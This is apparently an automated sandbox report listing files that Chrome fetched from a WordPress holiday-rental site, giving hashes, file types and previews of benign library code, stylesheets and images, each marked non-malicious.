              Preview:RIFFb$..WEBPVP8LV$../..?...m%..}"Q.jDt......`c.....j.3c...=/...8..&....s.p..>>a.......`V..k......0...`....`..`...*..M..7X.z.@...c.C.H.I .....1..4t.k.Z{....r.r..B8AN...`...%. ..$.*$pH..516...e..5N.16.|.S..q.^.......I.T;......m..3L...Rv......@.I.t....s,y.......?C...J..U.'.@=.k......|.....cNu..nS\......G....vs.F}..~,...b........^...=n(n?.4.=..A....'....K.s.l&=.....V..3..uq.....y.,.`....&b.&....N+.i..Q.v.v/.fF+YnX@f.h..v.R.A...4B|#..n.LF.....rn....p.eR.\.e......Y^XPfS.2..%\.v...gI..'%..A.^...H.F.s..6.v_x...V.....+...&... .U.,..`:.(.X.....]..h.... .X/...|.p.x..Q...7..m=..H6..7..[..R.<N.JtJ............}.}#...(..z.!m...[F.[...po..v.L.uQg..$....^..R.....[e....!.[.....vTD.1.9.H..E.....s..L|....}.kOYa.~mZ./..,...$....nB.M.r.w.P..E?.....e/...j%.n.[I.....]..X...W.......t..]`...J..e.O......^w..n.....YM.-.-.e...}^......R3.%o.He...M.+..3...^C.....O..E-w.P.%...><~.]%.g.OR...hHEq=?.l...a-m. ....zx>.'.........;..l.-...|JB>{..oK0<.3.=Q4.I... .*..%Y.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (36563)
              Category:dropped
              Size (bytes):36748
              Entropy (8bit):5.306381430117477
              Encrypted:false
              SSDEEP:
              MD5:5BE8137FC4144712DD6EC0AB1D72D1F7
              SHA1:AFD9824C40ADCE09368F144615EBA967D4C2E059
              SHA-256:8299FF4F0A4F809995DBACE583B14258B897EDA6EB49B44D6CC58C9A755D68BC
              SHA-512:0A331B95186601319793945AE0295F7D7276795A0291F107D95E53E537F38F22487C41041D259C81954376BAF127F735A54DF4C0F5562AE9C45C105E5BA4C7CC
              Malicious:false
              Reputation:unknown
              Preview:/*!. * jQuery UI Datepicker 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","../version","../keycode"],e):e(jQuery)}(function(V){"use strict";var n;function e(){this._curInst=null,this._keyEvent=!1,this._disabledInputs=[],this._datepickerShowing=!1,this._inDialog=!1,this._mainDivId="ui-datepicker-div",this._inlineClass="ui-datepicker-inline",this._appendClass="ui-datepicker-append",this._triggerClass="ui-datepicker-trigger",this._dialogClass="ui-datepicker-dialog",this._disableClass="ui-datepicker-disabled",this._unselectableClass="ui-datepicker-unselectable",this._currentClass="ui-datepicker-current-day",this._dayOverClass="ui-datepicker-days-cell-over",this.regional=[],this.regional[""]={closeText:"Done",prevText:"Prev",nextText:"Next",currentText:"Today",monthNames:["January","February","March","
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:downloaded
              Size (bytes):44
              Entropy (8bit):4.407962016217062
              Encrypted:false
              SSDEEP:
              MD5:6B585F5C88B1DA5E943C3ACD245A6D81
              SHA1:82E9CEA720948C27104A87399ACF00C10DD91381
              SHA-256:56CE79FF150C75D2E9A2A7EA5D514748FB1368BD9A5D0450A088F3DF451D956E
              SHA-512:61F728D259E040BC406BC32A44C8739EF4D96E0ED5F3386B74FA1E374C5D5E3FC019E722C946CD7373076BFE3BEC4128E30C851A438E6429AC7C95FDE6351DAF
              Malicious:false
              Reputation:unknown
              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i13!2i4015!3i2655!4i256!2m3!1e0!2sm!3i710461649!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sGB!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y5216621170424628885!2y8625392228163380715!2s%2Fg%2F11s17p8ndk!4m2!1x533021057!2x4260785921!15sgcid%3Aholiday_apartment_rental!2b0!3b0!6b0!8b0&client=google-maps-embed&token=118773
              Preview:RIFF$...WEBPVP8L..../..?..P.B....E...".....
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (27118), with no line terminators
              Category:downloaded
              Size (bytes):27118
              Entropy (8bit):5.281667243301751
              Encrypted:false
              SSDEEP:
              MD5:1C81C26999CEB485D4F9204B6AC2E83B
              SHA1:472923517F13C3037E48935EF87E000920D78AEE
              SHA-256:995D5E01BD25ECC38EAB3AA72DF6EBCABDC6959B693EA1A4901C2A18CA6E36A6
              SHA-512:50E25EE29695EA16160674B473D1A72111FC3CB9B69C52B6DAE85F02FB1322A777BB09D6B15AE2D4E3E7E5F25874BB46637C01D752C61C9E323D4D5614978161
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/wp-hotel-booking/assets/lib/slider/nouislider.min.js?ver=6.6.2
              Preview:!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports):"function"==typeof define&&define.amd?define(["exports"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).noUiSlider={})}(this,function(ot){"use strict";function n(t){return"object"==typeof t&&"function"==typeof t.to}function st(t){t.parentElement.removeChild(t)}function at(t){return null!=t}function lt(t){t.preventDefault()}function i(t){return"number"==typeof t&&!isNaN(t)&&isFinite(t)}function ut(t,e,r){0<r&&(ft(t,e),setTimeout(function(){dt(t,e)},r))}function ct(t){return Math.max(Math.min(t,100),0)}function pt(t){return Array.isArray(t)?t:[t]}function e(t){t=(t=String(t)).split(".");return 1<t.length?t[1].length:0}function ft(t,e){t.classList&&!/\s/.test(e)?t.classList.add(e):t.className+=" "+e}function dt(t,e){t.classList&&!/\s/.test(e)?t.classList.remove(e):t.className=t.className.replace(new RegExp("(^|\\b)"+e.split(" ").join("|")+"(\\b|$)","gi")," ")}function ht(t){var e=void 0!==window.pag
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:downloaded
              Size (bytes):9758
              Entropy (8bit):7.966676865573548
              Encrypted:false
              SSDEEP:
              MD5:3A11E5EE795175F92B5549FBAECFC50F
              SHA1:D248F79B65C87613E56E2993BADBBC4461D20805
              SHA-256:C50CA712D1D5969680558D2EB0652D72808A8B8287762000455E06235062019E
              SHA-512:CE0CFC63177F1B4C4F2AA343A21B8E2806BA0614DEDC5D0E22E1427EE5C6967204ECCDD3C394C02A02EEA55483C676EE9729E6DE82183780D32693F0D0DAD57B
              Malicious:false
              Reputation:unknown
              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i13!2i4017!3i2656!4i256!2m3!1e0!2sm!3i710461649!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sGB!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y5216621170424628885!2y8625392228163380715!2s%2Fg%2F11s17p8ndk!4m2!1x533021057!2x4260785921!15sgcid%3Aholiday_apartment_rental!2b0!3b0!6b0!8b0&client=google-maps-embed&token=51886
              Preview:RIFF.&..WEBPVP8L.&../..?.....m%.;..G0....]......wXA$.O.l..y..F....&....A...z.?.@.M.-.......6.".A..a..iQf...J........R.2.d..ah`h.kpO...K...).A....".I,.!...a+.Q..|.D...D.......*r.a.I..>;..o.?...g..A....m.l.6^.W..P.....,......1X....D...l.p....x:1\C~...i.m.|P1.......m.F......38.{X;....ry.....~.P.O.;^....~"iL......jqE..C./G.t.a(.../H..>.,:..../..C.o......s(DOdB..*_....a...^.W....p....O.........O..q....3.......-.-Z.....B..w.....w8S.y.8...y..?p`5-.].o.f..AD)+.5.../6..........D8..@......r$....H..X6...}......x@./.[<;}.....;...@..M.........(..l.....A.Dq.....F2.D...~..Q$.>...+..#l.(./.|.....X .......g.N...1..Y..V..:1..f.dy,..{t...bD...z.#J.+"3^D\.xA...!....+!.C.#b...f.e.9..BU...\r..!..Q.#...@.0.+.q...E.....x.]...f..CB1.!...t(!.E!......a..F...69..L...........f.|rct...,....:}.>.9]..<....o. ...`.......0a.....Q..*um[.+..c..o...!.&q...H..t..@^l.....W4dj[....7.......x!.E...3F.j....+.."..5...I.X.".1..............O....6.^.EO..8..q.....zb...8..u^N...h.._.R<..B
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:exported SGML document, ASCII text, with very long lines (3076), with no line terminators
              Category:dropped
              Size (bytes):3076
              Entropy (8bit):5.156941549871699
              Encrypted:false
              SSDEEP:
              MD5:41AFC655AD7ABDA98703EE1AAF551C1C
              SHA1:2954194E01064D136105CA7978BA2FF38EFA03D9
              SHA-256:88FF9374D3BAB0C6282357CF8FD961B59DE74727B0D7146F4A2484C95D929FEF
              SHA-512:E54C5475B1E96D979079AEE8647B7F4BF7F50D7D1570750A24577F69B3A64F98DA4F097E6AC615393008929641E5A82CF0BB888F9922D83CD1FC28B5041376B1
              Malicious:false
              Reputation:unknown
              Preview:!function(t){TPHB_Extra_Site={init:function(){this.toggle_extra(),this.removePackage()},parseJSON:function(a){if(!t.isPlainObject(a)){var e=a.match(/ HB_AJAX_START -->(.*) HB_AJAX_END -->/);try{a=e?t.parseJSON(e[1]):t.parseJSON(a)}catch(t){console.log(t),a={}}}return a},toggle_extra:function(){t(document).on("change",".number_room_select",function(a){a.preventDefault();var e=t(this),i=e.parents(".hb-search-room-results"),n=i.find(".hb_addition_package_extra"),o=n.find(".hb_addition_packages"),r=e.val();""!==r?(i.parent().siblings().find(".hb_addition_packages").removeClass("active").slideUp(),o.removeAttr("style").addClass("active"),n.removeAttr("style").slideDown()):(n.slideUp(),r=1),i.find(".hb_optional_quantity").val(r)}),t(document).on("click",".hb_package_toggle",function(a){a.preventDefault();var e=t(this),i=e.parents(".hb_addition_package_extra");toggle=i.find(".hb_addition_packages"),e.toggleClass("active"),toggle.toggleClass("active"),TPHB_Extra_Site.optional_toggle(to
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (908)
              Category:dropped
              Size (bytes):3103
              Entropy (8bit):5.5100284150735055
              Encrypted:false
              SSDEEP:
              MD5:0497C6C5015AFE4531A30CB355BD7D32
              SHA1:E29F13E2EA59FCDD1C5E94C75E7482D76102D4EC
              SHA-256:730855DDA0256C42213AEB4328F0CF31227723DAFB2B6A41C9C2949C5807D6CA
              SHA-512:0C87FF66C1C5672760333E4292E5FFA6F4F3CD4D0967C1C0D52C5701E79FAB8943DC32AA3BDB0FC94A361BB7D87EB0B0FC0A905ECD316B57758FEA3254B7A18D
              Malicious:false
              Reputation:unknown
              Preview:google.maps.__gjsload__('geometry', function(_){var Ypa=function(a,b){return Math.abs(_.Ej(b-a,-180,180))},Zpa=function(a,b,c,d,e){if(!d){c=Ypa(a.lng(),c)/Ypa(a.lng(),b.lng());if(!e)return e=Math.sin(_.ej(a.lat())),e=Math.log((1+e)/(1-e))/2,b=Math.sin(_.ej(b.lat())),_.fj(2*Math.atan(Math.exp(e+c*(Math.log((1+b)/(1-b))/2-e)))-Math.PI/2);a=e.fromLatLngToPoint(a);b=e.fromLatLngToPoint(b);return e.fromPointToLatLng(new _.Dl(a.x+c*(b.x-a.x),a.y+c*(b.y-a.y))).lat()}e=_.ej(a.lat());a=_.ej(a.lng());d=_.ej(b.lat());b=_.ej(b.lng());c=_.ej(c);return _.Ej(_.fj(Math.atan2(Math.sin(e)*.Math.cos(d)*Math.sin(c-b)-Math.sin(d)*Math.cos(e)*Math.sin(c-a),Math.cos(e)*Math.cos(d)*Math.sin(a-b))),-90,90)},$pa=function(a,b){a=new _.mk(a,!1);b=new _.mk(b,!1);return a.equals(b)},aqa=function(a,b,c){a=_.qk(a);c=c||1E-9;const d=_.Ej(a.lng(),-180,180),e=b instanceof _.Tn,f=!!b.get("geodesic"),g=b.get("latLngs");b=b.get("map");b=!f&&b?b.getProjection():null;for(let t=0,u=g.getLength();t<u;++t){const w=g.getAt(t),x=
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (586), with no line terminators
              Category:downloaded
              Size (bytes):586
              Entropy (8bit):4.378459937045033
              Encrypted:false
              SSDEEP:
              MD5:D471DFAA01DC6E2D445E8CAF5F0E8635
              SHA1:0381D786F687258D2B2CAFD8BA398523AFC67E10
              SHA-256:F49E8FADBE9D23DC5295AEDA59CF3B67B79AB7B5C19F192D5EACE15E941D31FD
              SHA-512:7D2570A17D80FF7ACCD597CA0568C271EF431FCBF452951D66677037659E27E30243977AFC6CA6B395A9F52264042A043DFDD11BD3105A8B2BCFBD5B959F40F1
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/uploads/elementor/css/post-837.css?ver=1726515513
              Preview:.elementor-bc-flex-widget .elementor-837 .elementor-element.elementor-element-19d0eb5.elementor-column .elementor-widget-wrap{align-items:center;}.elementor-837 .elementor-element.elementor-element-19d0eb5.elementor-column.elementor-element[data-element_type="column"] > .elementor-widget-wrap.elementor-element-populated{align-content:center;align-items:center;}.elementor-837 .elementor-element.elementor-element-19d0eb5.elementor-column > .elementor-widget-wrap{justify-content:center;}@media(min-width:768px){.elementor-837 .elementor-element.elementor-element-19d0eb5{width:100%;}}
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 2560x1349, components 3
              Category:dropped
              Size (bytes):400510
              Entropy (8bit):7.974822975946919
              Encrypted:false
              SSDEEP:
              MD5:41D4454523BD512C0E3991A968FD8D78
              SHA1:D04E21F1B05086B7E71CB79176E97F8B58D16612
              SHA-256:04D245B3581BD20F9C751E592578032BAE7F1CC75C1DBA01A082AB7A286415A8
              SHA-512:D7EC2442490A44BFA7E760DAEC326F73CD25BD471F761C71AF8CDA3F0C59164944F0BB770DD481E3DA316C6815DD81AFC6118DD7D78A494E8543185DDD6A1809
              Malicious:false
              Reputation:unknown
              Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......E...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...\sA....J%%;.....!..R.i..L8..T.*6..$tR..........R.IM....1E.n)1.;.....O.;.~..n8...Hh..I.v)1@Xi.".i(....O.4....4.H..M...CO4.).a.S...4.`0..H..M"....T.<W...!.....k.#..<E.[.8.o.V...C...n:U+...U...}*..s^...5fG.qGjN... ue .OJ...?;N).M+...}.......m.V.<VuV....4t..\/=.w..j...L...d.4hp......P...p.)...H.8u..)E...J).(
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text
              Category:downloaded
              Size (bytes):27249
              Entropy (8bit):5.102725454034097
              Encrypted:false
              SSDEEP:
              MD5:359ACA8A88B2331AA34AC505ACAD9911
              SHA1:800A4F56BB87049E1F0D45CF93C4E8EF79144B45
              SHA-256:655AE452D922F501B62C7028FC35E238138DE989387381CC1ED9CEA9085864DB
              SHA-512:694429B843B8BE04FFE5DEBB9DB48F45E02767F4B6AE177A5DF372F9AC26271FC0F969398AFF382DB631EDEA8547CC50F24EB470C21C750D507544D056550702
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/cookie-law-info/legacy/public/css/cookie-law-info-gdpr.css?ver=3.2.6
              Preview:.gdpr-container-fluid {..width: 100%;..padding-right: 15px;..padding-left: 15px;..margin-right: auto;..margin-left: auto;.}..gdpr-row {..display: -ms-flexbox;..display: flex;..-ms-flex-wrap: wrap;..flex-wrap: wrap;..margin-right: -15px;..margin-left: -15px;.}..gdpr-col-4 {..-ms-flex: 0 0 33.333333%;..flex: 0 0 33.333333%;..max-width: 33.333333%;.}..gdpr-col-8 {..-ms-flex: 0 0 66.666667%;..flex: 0 0 66.666667%;..max-width: 66.666667%;.}..gdpr-align-items-stretch {..-ms-flex-align: stretch!important;..align-items: stretch!important;.}..gdpr-d-flex {..display: -ms-flexbox!important;..display: flex!important;.}..gdpr-px-0 {..padding-left: 0;..padding-right: 0;.}..modal-backdrop.show {..opacity: .8;.}..modal-open {..overflow: hidden.}...modal-open .gdpr-modal {..overflow-x: hidden;..overflow-y: auto.}...gdpr-modal.fade .gdpr-modal-dialog {..transition: -webkit-transform .3s ease-out;..transition: transform .3s ease-out;..transition: transform .3s ease-out,-webkit-transform .3s ease-out;..-w
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (360)
              Category:downloaded
              Size (bytes):10395
              Entropy (8bit):4.784851936479022
              Encrypted:false
              SSDEEP:
              MD5:9F576C018D420F2F432F9706AACAB1D1
              SHA1:BC853F29E0CB6969A8BB810F7ACDBBDC4D323267
              SHA-256:CDDBA8F56D2C965900EF6F8683246BA8D4A92541F5827A29AB8B559D436969C7
              SHA-512:1F87EA0B0423878CC0562249D466E05E02B308B999D7F09F8BB598DEBBF00910675E530C0CE617EAEC3AE76B355AFB87D7BEF33DFDC49A9988159D36CC301B0D
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/css/simple-line-icons.css?ver=1726496070
              Preview:@font-face {. font-family: 'simple-line-icons';. src: url('../fonts/Simple-Line-Icons.eot?v=2.4.0');. src: url('../fonts/Simple-Line-Icons.eot?v=2.4.0#iefix') format('embedded-opentype'), url('../fonts/Simple-Line-Icons.woff2?v=2.4.0') format('woff2'), url('../fonts/Simple-Line-Icons.ttf?v=2.4.0') format('truetype'), url('../fonts/Simple-Line-Icons.woff?v=2.4.0') format('woff'), url('../fonts/Simple-Line-Icons.svg?v=2.4.0#simple-line-icons') format('svg');. font-weight: normal;. font-style: normal;.}./*. Use the following CSS code if you want to have a class per icon.. Instead of a list of all class selectors, you can use the generic [class*="icon-"] selector, but it's slower:.*/.[class^="sl-icon-"], [class*=" sl-icon-"] {. font-family: 'simple-line-icons';. speak: none;. font-style: normal;. font-weight: normal;. font-variant: normal;. text-transform: none;. /* Better Font Rendering =========== */. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text
              Category:downloaded
              Size (bytes):3106
              Entropy (8bit):5.0805450955042755
              Encrypted:false
              SSDEEP:
              MD5:20E8490FAB0DCF7557A5C8B54494DB6F
              SHA1:285DB746DFC0D43B9CA42F8D65B69C908FF72CA5
              SHA-256:FBE820B6140AD28E86F34FFAE507D807CF591A22697A05B71958F2014E96A9E4
              SHA-512:2B3DA277E8DF9273F672EC262B9700090612A9EF664899C9AC689FB815C708F787FBDC0DDEFE9037ADAA9C8384DE152E53B59EE017918A2E9AD1EB7D81BF90EB
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/cookie-law-info/legacy/public/css/cookie-law-info-public.css?ver=3.2.6
              Preview:#cookie-law-info-bar {..font-size: 15px;..margin: 0 auto;..padding: 12px 10px;..position: absolute;..text-align: center;..box-sizing: border-box;..width:100%;..z-index: 9999;../* box-shadow:rgba(0,0,0,.5) 0px 5px 50px; */..display: none;..left:0px;..font-weight:300;..box-shadow: 0 -1px 10px 0 rgba(172, 171, 171, 0.3);.}.#cookie-law-info-again {..font-size: 10pt;..margin: 0;..padding:5px 10px;..text-align: center;..z-index: 9999;..cursor: pointer;..box-shadow: #161616 2px 2px 5px 2px;.}.#cookie-law-info-bar span {..vertical-align: middle;.}../** Buttons (http://papermashup.com/demos/css-buttons) */..cli-plugin-button, .cli-plugin-button:visited {..display: inline-block;..padding: 9px 12px;..color: #fff;..text-decoration: none;..position: relative;..cursor: pointer;..margin-left: 5px;..text-decoration: none;.}..cli-plugin-main-link {..margin-left:0px;..font-weight: 550; text-decoration: underline;.}..cli-plugin-button:hover {..background-color: #111;..color: #fff;..text-decoration: none;
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (2048)
              Category:dropped
              Size (bytes):15032
              Entropy (8bit):4.575245175038097
              Encrypted:false
              SSDEEP:
              MD5:9F56C88AB7B44ED7C0C5B0F4BBC17A46
              SHA1:8A6076FFCB57B89CE4459875C37B4A6BC6CD20B1
              SHA-256:E7734254B21300ABF13C8A627F6787FA0B44FDA406445A51F62DB960E50B9B67
              SHA-512:A3BC22E700F57A3178E9C1F204181F882042F0531CD1D4C6DC4EB8E0B07C9A66C0E48121388AA3F6E86D66C836DFFA955B4C314BA96D4F87D6B0C36C416BBF69
              Malicious:false
              Reputation:unknown
              Preview:.'use strict';.(function ($) {.. function isInteger(a) {. return Number(a) || (a % 1 === 0);. }. window.mobileCheck = function() {. let check = false;. (function(a){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|he
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (2946)
              Category:downloaded
              Size (bytes):2981
              Entropy (8bit):5.174465669703351
              Encrypted:false
              SSDEEP:
              MD5:492F2C1A7EA7EB83FE42E0FF7CB51AA2
              SHA1:DB36A77F6AAA2063BFBEC02C2C0E967438C5A245
              SHA-256:E174A58A503AB84B3D1B9DE12FD3895788204485170F1289E445F7B5B98EC789
              SHA-512:EEE6A1C268A519F4F281B2D76B5193BB068E94D1410372EF062587888589E139B20BB635E2331E97C857D7D835E9372F50822C5DAED29B139AB91FF5633C7A7F
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-includes/js/comment-reply.min.js?ver=6.6.2
              Preview:/*! This file is auto-generated */.window.addComment=function(v){var I,C,h,E=v.document,b={commentReplyClass:"comment-reply-link",commentReplyTitleId:"reply-title",cancelReplyId:"cancel-comment-reply-link",commentFormId:"commentform",temporaryFormId:"wp-temp-form-div",parentIdFieldId:"comment_parent",postIdFieldId:"comment_post_ID"},e=v.MutationObserver||v.WebKitMutationObserver||v.MozMutationObserver,r="querySelector"in E&&"addEventListener"in v,n=!!E.documentElement.dataset;function t(){d(),e&&new e(o).observe(E.body,{childList:!0,subtree:!0})}function d(e){if(r&&(I=g(b.cancelReplyId),C=g(b.commentFormId),I)){I.addEventListener("touchstart",l),I.addEventListener("click",l);function t(e){if((e.metaKey||e.ctrlKey)&&13===e.keyCode)return C.removeEventListener("keydown",t),e.preventDefault(),C.submit.click(),!1}C&&C.addEventListener("keydown",t);for(var n,d=function(e){var t=b.commentReplyClass;e&&e.childNodes||(e=E);e=E.getElementsByClassName?e.getElementsByClassName(t):e.querySelectorA
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:PNG image data, 70 x 210, 8-bit/color RGBA, non-interlaced
              Category:downloaded
              Size (bytes):4765
              Entropy (8bit):7.914349551855348
              Encrypted:false
              SSDEEP:
              MD5:9A942045EC3F115DAE872C3BE6B3A047
              SHA1:AF88E5C73E9D34C671A7ED099C0628C249DFD9E2
              SHA-256:EA80D10D991B201E42309C3FC535F9ABE17F5F37E4128A69E41E05B233DFB223
              SHA-512:7F5FA48CEE78FE5C887A8EB9C69076D03D6DD9B2B05E29CA4A0F7C48146064D4F94E9B0301910CBE6929B99121E99C2B309F2EEB564BDAE2F7E29259ABD66CDA
              Malicious:false
              Reputation:unknown
              URL:https://maps.gstatic.com/mapfiles/embed/images/entity11.png
              Preview:.PNG........IHDR...F...............dIDATx...utT.....K.HZ&......"W..n.e....?.........*.8$xm.H.PA..@3..~.........ae....Ygr...og.$}rU4{j..&...v.0....D...-*.........e} j.]...y.:`..\........QF........e$.1:`.-.QF.......T.<G.x.S.T.~.<G.x.S.T.~.<G.x.S...s$......>^1G..K......s$.......^1....Q....'..%..8.v.@a<.......R..;..8#...C[jQc...g$:.vhK-j.0a..p.2P..a<...e....x.3.%.@Qc.......(..h.7(.G...Tc.uC..z.S.]V.j..n.r].q..0.V.:.9..^......SiE..S......SiE..S...4Lk.D...D..~....Z+L....H.ZaB\.=..B..s..%.u.p...0.a...lWL..\jEI.u.p..E...0#.0/.)..+.Ki.3...R.&.....Da.?L4^..wA<..=.E*.S^^~(..D.S..\w0.d .`...a..%...L..@....'....n...0U...$D<..-..Ei.R.-.2}.I.S.|..bH../Z....%!J.|..bV../Z....%!..|..*...-....;.cq...F..9..c......\..p.u.d..........|.8q<.DH.".nwT@.T..WDwT@.T......ys+..|...d..@,E..Fag. ;1...a.v...S.7.....F..]=\..VC{...=.Oza5.Gk.;.}'.K.k..dO..u...v..=9>n.1.#.."){r.~b.k.me....nn.o+.....(....Y....w$.....=......s*t.NKG...".bX..+.uK...B;L....P/....|B-v.X.....8!.......8
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (709), with no line terminators
              Category:dropped
              Size (bytes):709
              Entropy (8bit):4.984822838384905
              Encrypted:false
              SSDEEP:
              MD5:59CCCD1FF20A6751060F4A0879A4FD5D
              SHA1:3F04BD341C4F4DD7296CE918519DABE6CC2BE397
              SHA-256:3679474E4D38FDD05F8E14FDDA15F77F0BBDF2BE326B6AFA9DFADEFFA567B8A8
              SHA-512:E31E456E955C1B9C7F8AFF46CB6ED9E878E598AB4000A9465E96D6FD744C71EC038FA5AB743342A3F00AB21FEF598C61D9D563A4BDB3076C65FC555578CA2029
              Malicious:false
              Reputation:unknown
              Preview:document.addEventListener("DOMContentLoaded",(()=>{(()=>{const e=document.querySelector(".sort-by-wrapper");if(!e)return;const t=e.querySelector(".toggle"),r=e.querySelector("ul").querySelectorAll("li");[...r].map((e=>{e.addEventListener("click",(function(o){[...r].map((e=>{e.classList.remove("active")})),e.classList.add("active"),t.innerHTML=e.innerHTML}))}))})(),(()=>{const e=document.querySelector(".sort-by-wrapper");e&&(document.querySelector("#hb-form-search-page")||[...e.querySelector("ul").querySelectorAll("li")].map((e=>{e.addEventListener("click",(function(t){const r=new URL(window.location.href);r.searchParams.set("sort_by",e.getAttribute("data-value")),window.location.href=r}))})))})()}));
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (4272)
              Category:dropped
              Size (bytes):4307
              Entropy (8bit):5.146101486826543
              Encrypted:false
              SSDEEP:
              MD5:072D3F6E5C446F57D5C544F9931860E2
              SHA1:EE6AA3D65B474309376468B24BB6F829A4514809
              SHA-256:2CB546FBDDA7995D374FFFA4B2F6530BBCF57D014639DDF76DE45DF43D593045
              SHA-512:19CEB31EC694AC5C42A0A7B02CFC1C31DDFC033DD62916A1C55BBBDD2435E21F73127C539687633E96F2706B2D75C37609B44A9C9462B63F9F96795CB4495968
              Malicious:false
              Reputation:unknown
              Preview:/*! This file is auto-generated */.(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};t.r(e),t.d(e,{actions:()=>S,addAction:()=>m,addFilter:()=>p,applyFilters:()=>k,createHooks:()=>h,currentAction:()=>w,currentFilter:()=>I,defaultHooks:()=>f,didAction:()=>O,didFilter:()=>j,doAction:()=>b,doingAction:()=>x,doingFilter:()=>T,filters:()=>z,hasAction:()=>v,hasFilter:()=>y,removeAction:()=>A,removeAllActions:()=>F,removeAllFilters:()=>g,removeFilter:()=>_});const n=function(t){return"string"!=typeof t||""===t?(console.error("The namespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only contain numbers, letters, dashes, periods, unders
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text
              Category:downloaded
              Size (bytes):4752
              Entropy (8bit):4.807260087400541
              Encrypted:false
              SSDEEP:
              MD5:D5B507775BBDF34ADB1AC9914F8CA020
              SHA1:8979EED0C1957152258433F223D67C579136ADCE
              SHA-256:6F965531C70972C209917C1867F595940AD8A2416935C04D024A7373A28C234D
